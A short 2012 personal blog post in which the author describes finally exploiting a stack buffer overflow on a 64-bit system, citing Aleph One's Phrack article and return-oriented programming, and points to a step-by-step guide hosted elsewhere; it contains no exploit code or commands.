Sunday, August 26, 2012

Smashing the non-executable stack for fun and profit

In 1996, Elias Levy ("Aleph One") published "Smashing The Stack For Fun And Profit" in Phrack magazine. The article showed how to overflow a buffer to launch a shell.

I’m almost ashamed I never took a closer look for over a decade. My background would suggest I’d be one of the early adopters. As a kid, I loved messing with assembly language and poking around the system. I collected computer viruses. I bypassed copy protection systems. I knew how to make free phone calls. In grad school, my advisor and my colleagues taught a computer security class, where rooting a system by smashing the stack was a homework assignment.

With pride, and relief, I can now announce that at long last, in 2012, I have exploited a buffer overflow. Moreover, I have written a truly marvelous step-by-step guide to this, which this post is too narrow to contain. (I’m afraid of overflowing it.) I took notes because I encountered difficulties with other tutorials:

  • 32-bit systems are often assumed. My system is 64-bit.

  • Various countermeasures are now enabled on stock installs.

  • I wanted to try a newer variant of the attack known as return-oriented programming, which defeats one of the countermeasures.

Luckily my website has ample room. Read now, and get a bonus shell script that demonstrates the attack!

No comments: